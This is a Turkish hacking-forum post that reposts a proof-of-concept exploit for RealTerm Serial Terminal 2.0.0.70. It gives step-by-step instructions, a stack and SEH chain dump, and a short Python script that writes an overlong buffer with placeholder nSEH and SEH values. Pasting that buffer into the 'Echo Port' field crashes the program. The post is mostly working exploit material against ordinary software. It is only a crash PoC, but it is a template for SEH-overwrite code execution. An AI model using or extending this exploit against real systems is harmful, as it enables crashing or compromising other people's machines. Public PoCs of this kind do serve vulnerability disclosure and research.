İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

RealTerm: Serial Terminal 2.0.0.70

21-02-2019 18:30
#1
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
653
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
Ticaret:
(0) %
#Exploit Title/Exploit Başlığı: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Overflow Crash (SEH) (PoC)
# Date/Tarih: 16/02/2019
# Exploit Author/Exploit Yazarı: Alejandra SA!nchez
# Vendor Homepage/Yapımcı Sitesi: https://realterm.sourceforge.io/
# Software Link/Yazılımın Linki: https://sourceforge.net/projects/realterm/files/
# Version/Versiyon: 2.0.0.70
# Tested on/Test Edilen Sistem: Windows 10 / Windows XP


# 1.- Python kodunu çalıştırın: "EchoPort.py" bu yeni bir dosya oluşturacak "EchoPort.txt" adında.
# 2.-Sonra 'EchoPort.txt' dosyasının içindekileri kopyalayın.
# 3.- realterm.exe yi açın
# 4.- 'Echo Port' sekmesine gidin.
# 5.- Kopyaladığınızı 'Port' alanına yapıştırın.
# 6.- Değiştir butonuna tıklayın.
# 7.- Tamamdır.

#PoC çalıştıktan sonra SEH zinciri böyle gözükecek :
#0012F57C 43434343
#42424242 *** CORRUPT ENTRY ***

# Ve Stack

#0012F568 41414141 AAAA
#0012F56C 41414141 AAAA
#0012F570 41414141 AAAA
#0012F574 41414141 AAAA
#0012F578 42424242 BBBB Pointer to next SEH record
#0012F57C 43434343 CCCC SE handler


buffer = "\x41" * 268
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("EchoPort.txt", "w")
f.write(buffer+nseh+seh)
f.close()




Exploit Linki :
https://cxsecurity.com/issue/WLB-2019020198
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE

Heaven Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı